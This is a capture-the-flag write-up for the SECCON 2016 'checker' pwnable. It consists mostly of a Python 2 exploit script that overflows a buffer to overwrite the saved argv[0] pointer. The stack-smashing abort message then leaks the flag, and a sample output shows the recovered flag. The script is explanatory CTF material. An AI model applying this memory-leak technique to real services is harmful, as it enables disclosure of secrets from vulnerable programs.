SECCON CTF QUAL 2016 - checker
Category : Pwnables
Summary : memory leak through the SSP (stack smashing protector) abort message
Exploit
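#!/usr/bin/python
# Python 2 script: protocol data is handled as plain byte strings (str).
#
# Exploit from the write-up for the SECCON CTF 2016 qualifier task "checker".
#
# What the sample run at the bottom shows: the service is built with the
# stack smashing protector (SSP). When the canary check fails, the glibc of
# that era aborts with
#     *** stack smashing detected ***: <program name> terminated
# where <program name> is read through the argv[0] pointer kept on the stack.
# The overlong input replaces that pointer, so the abort message prints the
# bytes stored at the chosen address -- here the flag -- instead of the
# program name.
#
# Reading this as a defender: the canary works as designed (control flow is
# never taken over), but the diagnostic itself becomes the disclosure channel.
# Newer glibc releases no longer print argv[0] in this message, and the
# hard-coded address below suggests the secret sits at a fixed location in a
# binary that is presumably not position-independent (confirm against the
# binary).
from socket import *
from struct import pack, unpack
import time


def rc(s, ch):
    """Read from socket *s* one byte at a time until *ch* has been received.

    Returns everything read so far, *ch* included. Raises EOFError when the
    peer closes the connection first; without that check recv() keeps
    returning '' and the loop never ends.
    """
    res = ''
    while ch not in res:
        byte = s.recv(1)
        if not byte:
            raise EOFError('connection closed before %r was received' % ch)
        res += byte
    return res


# 32-bit little-endian pack/unpack helpers; not used by the steps below.
p = lambda x: pack("<L", x)
up = lambda x: unpack("<L", x)[0]

HOST = 'checker.pwn.seccon.jp'
PORT = 14726

# 0x178 filler bytes followed by 0x6010c0 written as a 64-bit little-endian
# pointer. NOTE(review): 0x178 is presumably the distance from the input
# buffer to the saved argv[0] pointer, and 0x6010c0 the address of the flag
# buffer -- neither is derivable from this page alone.
target = "a"*0x178+"\xc0\x10\x60\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
try:
    s.connect((HOST, PORT))

    rc(s, 'NAME : ')
    s.send('pwn3r\n')

    # Four lines, each one byte shorter than the last. NOTE(review): a NUL
    # cannot travel inside a line, so this presumably relies on the service
    # writing its own string terminator after each line, clearing the upper
    # bytes of the pointer one at a time -- confirm against the binary.
    for trim in range(1, 5):
        rc(s, '>> ')
        s.send('a'*(len(target) - trim)+'\n')

    # Filler plus the three non-zero address bytes; the bytes above them
    # were handled by the previous four lines.
    rc(s, '>> ')
    s.send(target[:0x178+3]+'\n')

    # Answer the remaining prompts; the abort message follows (see the
    # sample output below).
    rc(s, '>> ')
    s.send('yes'+'\n')

    rc(s, 'FLAG : ')
    s.send('gogo\n')

    # Give the service a moment to emit the abort message before reading.
    time.sleep(1)
    print(s.recv(1024))
finally:
    # Release the socket even when a prompt never arrives.
    s.close()

"""
pwn3r$ python check_exploit.py
You are a liar...
*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
"""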